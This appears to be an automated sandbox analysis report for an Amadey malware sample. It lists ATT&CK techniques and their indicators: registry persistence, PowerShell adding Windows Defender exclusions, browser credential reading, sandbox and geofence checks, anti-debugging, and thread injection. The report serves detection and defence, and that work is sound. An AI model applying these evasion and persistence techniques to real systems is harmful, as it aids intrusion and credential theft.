amadey | edb3554e48c8e4751c020b257a0f4927b37ef4c17e244f535dd144c63618c830

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\131.0.2903.146\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"	setup.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	tv_enua.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	MSAGENT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge"	setup.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3248	powershell.exe
4372	powershell.exe

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0"	MicrosoftEdgeUpdate.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	22040691
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Ide.com
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	c4652134bb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	22040691
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Delta V3.61 b_95073919.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	setup.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
5164	MSAGENT.EXE
5184	tv_enua.exe
5232	AgentSvr.exe
5604	BonziBDY_4.EXE
3136	AgentSvr.exe
2356	winrar-x64-701.exe
3604	Setup.exe
4788	wget.exe
5328	Setup.exe
6020	wget.exe
4908	winrar.exe
5804	11025900
1104	wget.exe
5848	winrar.exe
4220	11025900
3812	wget.exe
5156	winrar.exe
3772	winrar.exe
5140	22040691
5832	22040691
3652	Ide.com
5216	c4652134bb.exe
2896	Officials.com
1720	Officials.com
4344	Delta V3.61 b_95073919.exe
1084	OperaGX.exe
3888	setup.exe
5100	setup.exe
5512	setup.exe
3264	setup.exe
5128	setup.exe
2060	Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
6116	assistant_installer.exe
2636	assistant_installer.exe
2184	ContentI3.exe
5296	RobloxPlayerInstaller.exe
4400	MicrosoftEdgeWebview2Setup.exe
5444	MicrosoftEdgeUpdate.exe
5188	MicrosoftEdgeUpdate.exe
1508	MicrosoftEdgeUpdate.exe
4036	MicrosoftEdgeUpdateComRegisterShell64.exe
1984	MicrosoftEdgeUpdateComRegisterShell64.exe
4720	MicrosoftEdgeUpdateComRegisterShell64.exe
1220	MicrosoftEdgeUpdate.exe
5888	MicrosoftEdgeUpdate.exe
4464	MicrosoftEdgeUpdate.exe
1532	MicrosoftEdgeUpdate.exe
3812	MicrosoftEdge_X64_131.0.2903.146.exe
1372	setup.exe
3492	setup.exe
4072	RobloxPlayerInstaller (1).exe
6104	RobloxPlayerInstaller (1).exe
220	MicrosoftEdgeUpdate.exe
5424	RobloxPlayerBeta.exe
4460	RobloxPlayerInstaller (1).exe
6064	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
2604	RobloxPlayerBeta.exe
5444	RobloxPlayerBeta.exe
5316	RobloxPlayerBeta.exe
1212	RobloxPlayerBeta.exe
2508	RobloxPlayerBeta.exe
1548	RobloxPlayerBeta.exe

Loads dropped DLL 64 IoCs

pid	Process
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
1508	BonziBuddy432.exe
5184	tv_enua.exe
5884	regsvr32.exe
5884	regsvr32.exe
5916	regsvr32.exe
5164	MSAGENT.EXE
5892	regsvr32.exe
2092	regsvr32.exe
5916	regsvr32.exe
5932	regsvr32.exe
5088	regsvr32.exe
2764	regsvr32.exe
5992	regsvr32.exe
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
3136	AgentSvr.exe
3136	AgentSvr.exe
3136	AgentSvr.exe
3136	AgentSvr.exe
3136	AgentSvr.exe
5604	BonziBDY_4.EXE
5604	BonziBDY_4.EXE
4028	rundll32.exe
3888	setup.exe
5100	setup.exe
5512	setup.exe
3264	setup.exe
5128	setup.exe
5444	MicrosoftEdgeUpdate.exe
5188	MicrosoftEdgeUpdate.exe
1508	MicrosoftEdgeUpdate.exe
4036	MicrosoftEdgeUpdateComRegisterShell64.exe
1508	MicrosoftEdgeUpdate.exe
1984	MicrosoftEdgeUpdateComRegisterShell64.exe
1508	MicrosoftEdgeUpdate.exe
4720	MicrosoftEdgeUpdateComRegisterShell64.exe
1508	MicrosoftEdgeUpdate.exe
1220	MicrosoftEdgeUpdate.exe
5888	MicrosoftEdgeUpdate.exe
4464	MicrosoftEdgeUpdate.exe
4464	MicrosoftEdgeUpdate.exe
5888	MicrosoftEdgeUpdate.exe
1532	MicrosoftEdgeUpdate.exe
220	MicrosoftEdgeUpdate.exe
5424	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
2604	RobloxPlayerBeta.exe
5444	RobloxPlayerBeta.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	tv_enua.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerInstaller (1).exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerInstaller.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	RobloxPlayerInstaller.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	setup.exe
File opened (read-only)	\??\F:	setup.exe
File opened (read-only)	\??\D:	setup.exe
File opened (read-only)	\??\F:	setup.exe

Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

Browser Extensions

T1176

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO"	setup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
1144	raw.githubusercontent.com
696	camo.githubusercontent.com
702	camo.githubusercontent.com
703	camo.githubusercontent.com
704	camo.githubusercontent.com
1105	bitbucket.org
1106	bitbucket.org
1143	raw.githubusercontent.com

Checks system information in the registry 2 TTPs 24 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	MicrosoftEdgeUpdate.exe

Detected potential entity reuse from brand SLACK.
phishing slack
Detected potential entity reuse from brand STEAM.
phishing steam

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\msvcp50.dll	tv_enua.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\SysWOW64\SET8A69.tmp	tv_enua.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk	setup.exe
File created	C:\Windows\SysWOW64\SET8A69.tmp	tv_enua.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5900	tasklist.exe
3296	tasklist.exe
6108	tasklist.exe
2148	tasklist.exe

Suspicious use of NtCreateThreadExHideFromDebugger 8 IoCs

pid	Process
5424	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
2604	RobloxPlayerBeta.exe
2508	RobloxPlayerBeta.exe
1548	RobloxPlayerBeta.exe
3192	RobloxPlayerBeta.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
5804	11025900
4220	11025900
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
5424	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
6064	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
2184	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe
3520	RobloxPlayerBeta.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2896 set thread context of 1720	2896	Officials.com	337
PID 1720 set thread context of 5200	1720	Officials.com	347

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5200-7179-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7182-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7180-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7177-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7189-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7187-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7186-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7185-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7188-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7183-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7181-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7178-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7348-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/5200-7349-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.146\identity_proxy\win11\identity_helper.Sparse.Internal.msix	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\DraftsWidget\newSource.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\VoiceChat\SpeakerLight\Unmuted40.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Temp\EUD79A.tmp\MicrosoftEdgeUpdateSetup.exe	MicrosoftEdgeWebview2Setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaApp\icons\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaChat\graphic\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\AnimationEditor\button_zoom.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\CompositorDebugger\play.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Emotes\Small\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Lobby\Buttons\nine_slice_button.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\MenuBar\icon_leave.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaChat\9-slice\search.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\sites.nbd	BonziBuddy432.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\AnimationEditor\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Backpack_Open.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\Debugger\Resume.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaApp\icons\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaChat\graphic\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.146\oneds.dll	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\MaterialManager\Fill-lighttheme.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\TopBar\iconBase.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaChat\icons\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Controls\DefaultController\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\InGameMenu\ScrollMiddle.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\InspectMenu\ico_alert_tilt.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Settings\Players\Unmute.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\VoiceChat\MicDark\Connecting.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\GameSettings\CenterPlus.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\ErrorIconSmall.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Controls\xboxView.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUCA7E.tmp\msedgeupdateres_bg.dll	MicrosoftEdgeUpdateSetup_X86_1.3.195.43.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUCA7E.tmp\msedgeupdateres_az.dll	MicrosoftEdgeUpdateSetup_X86_1.3.195.43.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.146\identity_proxy\dev.identity_helper.exe.manifest	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Locales\cs.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\AvatarEditorImages\Sliders\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Controls\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\Controls\DesignSystem\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\VoiceChat\MicLight\Muted.png	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Locales\ja.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\GameSettings\edit.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Controls\DefaultController\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\TopBar\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\EdgeWebView.dat	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Locales\zh-CN.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaApp\category\ic-popular.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaApp\category\ic-top [email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\ExtraContent\textures\ui\LuaChat\9-slice\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUD79A.tmp\MicrosoftEdgeUpdateBroker.exe	MicrosoftEdgeWebview2Setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\131.0.2903.146\Locales\gl.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\9SliceEditor\[email protected]	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Slider.png	RobloxPlayerInstaller.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\VoiceChat\RedSpeakerLight\[email protected]	RobloxPlayerInstaller.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\131.0.2903.146\Locales\fr-CA.pak	setup.exe
File created	C:\Program Files (x86)\Roblox\Versions\version-37cf60402a5648b4\content\textures\ui\Settings\Radial\Alert.png	RobloxPlayerInstaller.exe
